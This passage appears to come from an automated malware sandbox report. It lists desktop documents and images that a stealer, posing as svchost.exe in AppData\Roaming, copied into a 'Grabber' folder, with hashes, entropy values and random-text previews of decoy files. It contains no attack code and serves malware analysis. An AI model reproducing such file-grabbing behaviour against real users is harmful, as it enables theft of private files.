                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\EFOYFBOLXA.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\GIGIYTFFYT.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\JDDHMPCDUJ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\PALRGUCVEH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:true
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\ZGGKNSUKOP.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EIVQSAOTAQ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EOWRVPQCCS.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GIGIYTFFYT.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
